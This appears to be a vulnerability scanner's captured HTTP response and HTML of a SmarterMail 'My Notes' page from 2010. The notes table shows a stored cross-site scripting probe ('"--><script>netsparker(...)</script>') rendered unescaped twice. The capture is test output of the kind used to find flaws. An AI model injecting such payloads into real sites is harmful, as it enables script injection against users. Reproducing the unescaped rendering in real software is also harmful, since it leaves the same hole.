<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">
<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden"> </th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZmE3NGZjMWRhMjI5NDJlMTliMmI4YzI0Nzc1ZGY5ZDU-" name="ctl00_MPH_HyperGrid1_CB64_ZmE3NGZjMWRhMjI5NDJlMTliMmI4YzI0Nzc1ZGY5ZDU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MzA1ZTg5YzI5MWYzNDYxMThiMzA2NDI3N2EwYTdiM2I-" name="ctl00_MPH_HyperGrid1_CB64_MzA1ZTg5YzI5MWYzNDYxMThiMzA2NDI3N2EwYTdiM2I-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">'"--><script>netsparker(0x009584)</script></td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzcyY2MwNmYzZDAyNDU5MmFkNTBkMDY5ZDZmOTFiNDM-" name="ctl00_MPH_HyperGrid1_CB64_YzcyY2MwNmYzZDAyNDU5MmFkNTBkMDY5ZDZmOTFiNDM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZWMyNmNiMzM1YzY3NDJmMDliMjMyYzVlYjgxYTQ2ODU-" name="ctl00_MPH_HyperGrid1_CB64_ZWMyNmNiMzM1YzY3NDJmMDliMjMyYzVlYjgxYTQ2ODU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZGVjNjA3YTkzZjc5NDc2NGIwNmZkMDYyZWJjYThhMGY-" name="ctl00_MPH_HyperGrid1_CB64_ZGVjNjA3YTkzZjc5NDc2NGIwNmZkMDYyZWJjYThhMGY-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MmU4NTI1NGZkNzVlNDgxNDlmNjViNjZjZTM0NDY4YzE-" name="ctl00_MPH_HyperGrid1_CB64_MmU4NTI1NGZkNzVlNDgxNDlmNjViNjZjZTM0NDY4YzE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MjBkM2VmODY1MjJlNDkxNThhODY3MjNmMGYzNzlhYTM-" name="ctl00_MPH_HyperGrid1_CB64_MjBkM2VmODY1MjJlNDkxNThhODY3MjNmMGYzNzlhYTM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NzAwMmQxNDM2MWY4NDBhZjg0YWY2MWRjNmM3MzBmN2Y-" name="ctl00_MPH_HyperGrid1_CB64_NzAwMmQxNDM2MWY4NDBhZjg0YWY2MWRjNmM3MzBmN2Y-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></..
Identification Response
HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:18:00 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10699
Connection: Close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNDA1MDIwMjQPFggeCF9fX1RpdGxlBQhNeSBOb3Rlcx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHgRfc0dGZxYCZg9kFgICAQ9kFgwCAw9kFgICAQ9kFgQCAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFOk9wZW5OZXdNZXNzYWdlKCdmcm1Ob3RlLmFzcHg/cmV0PTEmcG9wdXA9dHJ1ZScsIDYwMCwgNTAwKTtkZAIDDw8WAh4OTmF2aWdhdGVUYXJnZXQFC2RvdWJsZWNsaWNrZGQCBA8WAh4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsWAgIBD2QWBgIBDw9kFgIeCk9uS2V5UHJlc3MFS3JldHVybiBFbnRlckhhbmRsZXIoZXZlbnQsIGZ1bmN0aW9uKCl7X19kb1Bvc3RCYWNrKCdjdGwwMCRTUEgkYnRuR28nLCcnKX0pO2QCAg8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQYKQWxsIENvbG9ycwVXaGl0ZQZZZWxsb3cEUGluawVHcmVlbgRCbHVlFQYABXdoaXRlBnllbGxvdwRwaW5rBWdyZWVuBGJsdWUUKwMGZ2dnZ2dnZGQCAw8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQMOQWxsIENhdGVnb3JpZXMLTm8gQ2F0ZWdvcnkBMRUDAAEgATEUKwMDZ2dnZGQCBg8WAh4HVmlzaWJsZWhkAgcPZBYCZg9kFgICAQ8WAh8JaBYCAgEPFgIeBFRleHRlZAIIDxYCHwloZAILD2QWAgIDD2QWAgIBD2QWAmYPZBYCAgEPDxYCHwoFCzU5MCBub3RlKHMpZGQYAgUXY3RsMDAkTmF2UEgkSHlwZXJQYWdlcjEPBSBjdGwwMF9NUEhfSHlwZXJHcmlkMXwxMnwwfDl8NTB8MGQFFGN0bDAwJE1QSCRIeXBlckdyaWQxDwUxVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHJlYWxkYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGSrCPmBIlXlg3PYfQ19jYDEVmGT9Q==" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
self.EnableAnimations = false;
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>
<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>
<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">
<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>
</div>
<div class="ButtonBarRight">
</div>
<div class="ButtonBarClear">
<div class="ie6fix">
</div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">
<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>
</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="1">1</option>
</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>
<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>
<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>
</div>
<span id="ctl00_UpdatePanel1">
</span>
<div id="Scrollable" class="ContentDiv">
<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">
<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden"> </th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NzMxMzc4MDNmMzQ5NDBlZWFjNTI2ZTViZmMxYzg5MTE-" name="ctl00_MPH_HyperGrid1_CB64_NzMxMzc4MDNmMzQ5NDBlZWFjNTI2ZTViZmMxYzg5MTE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZmE3NGZjMWRhMjI5NDJlMTliMmI4YzI0Nzc1ZGY5ZDU-" name="ctl00_MPH_HyperGrid1_CB64_ZmE3NGZjMWRhMjI5NDJlMTliMmI4YzI0Nzc1ZGY5ZDU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MzA1ZTg5YzI5MWYzNDYxMThiMzA2NDI3N2EwYTdiM2I-" name="ctl00_MPH_HyperGrid1_CB64_MzA1ZTg5YzI5MWYzNDYxMThiMzA2NDI3N2EwYTdiM2I-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">'"--><script>netsparker(0x009584)</script></td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzQwYWU0NWNmZWIxNGIzNTg0YTNhNDI2ZGY3MzBhN2Q-" name="ctl00_MPH_HyperGrid1_CB64_YzQwYWU0NWNmZWIxNGIzNTg0YTNhNDI2ZGY3MzBhN2Q-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzcyY2MwNmYzZDAyNDU5MmFkNTBkMDY5ZDZmOTFiNDM-" name="ctl00_MPH_HyperGrid1_CB64_YzcyY2MwNmYzZDAyNDU5MmFkNTBkMDY5ZDZmOTFiNDM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZWMyNmNiMzM1YzY3NDJmMDliMjMyYzVlYjgxYTQ2ODU-" name="ctl00_MPH_HyperGrid1_CB64_ZWMyNmNiMzM1YzY3NDJmMDliMjMyYzVlYjgxYTQ2ODU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZGVjNjA3YTkzZjc5NDc2NGIwNmZkMDYyZWJjYThhMGY-" name="ctl00_MPH_HyperGrid1_CB64_ZGVjNjA3YTkzZjc5NDc2NGIwNmZkMDYyZWJjYThhMGY-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MmU4NTI1NGZkNzVlNDgxNDlmNjViNjZjZTM0NDY4YzE-" name="ctl00_MPH_HyperGrid1_CB64_MmU4NTI1NGZkNzVlNDgxNDlmNjViNjZjZTM0NDY4YzE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></..
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:18:00 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10699
Connection: Close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNDA1MDIwMjQPFggeCF9fX1RpdGxlBQhNeSBOb3Rlcx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHgRfc0dGZxYCZg9kFgICAQ9kFgwCAw9kFgICAQ9kFgQCAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFOk9wZW5OZXdNZXNzYWdlKCdmcm1Ob3RlLmFzcHg/cmV0PTEmcG9wdXA9dHJ1ZScsIDYwMCwgNTAwKTtkZAIDDw8WAh4OTmF2aWdhdGVUYXJnZXQFC2RvdWJsZWNsaWNrZGQCBA8WAh4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsWAgIBD2QWBgIBDw9kFgIeCk9uS2V5UHJlc3MFS3JldHVybiBFbnRlckhhbmRsZXIoZXZlbnQsIGZ1bmN0aW9uKCl7X19kb1Bvc3RCYWNrKCdjdGwwMCRTUEgkYnRuR28nLCcnKX0pO2QCAg8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQYKQWxsIENvbG9ycwVXaGl0ZQZZZWxsb3cEUGluawVHcmVlbgRCbHVlFQYABXdoaXRlBnllbGxvdwRwaW5rBWdyZWVuBGJsdWUUKwMGZ2dnZ2dnZGQCAw8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQMOQWxsIENhdGVnb3JpZXMLTm8gQ2F0ZWdvcnkBMRUDAAEgATEUKwMDZ2dnZGQCBg8WAh4HVmlzaWJsZWhkAgcPZBYCZg9kFgICAQ8WAh8JaBYCAgEPFgIeBFRleHRlZAIIDxYCHwloZAILD2QWAgIDD2QWAgIBD2QWAmYPZBYCAgEPDxYCHwoFCzU5MCBub3RlKHMpZGQYAgUXY3RsMDAkTmF2UEgkSHlwZXJQYWdlcjEPBSBjdGwwMF9NUEhfSHlwZXJHcmlkMXwxMnwwfDl8NTB8MGQFFGN0bDAwJE1QSCRIeXBlckdyaWQxDwUxVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHJlYWxkYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGSrCPmBIlXlg3PYfQ19jYDEVmGT9Q==" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
self.EnableAnimations = false;
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>
<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>
<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">
<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>
</div>
<div class="ButtonBarRight">
</div>
<div class="ButtonBarClear">
<div class="ie6fix">
</div>
</div>
</div>
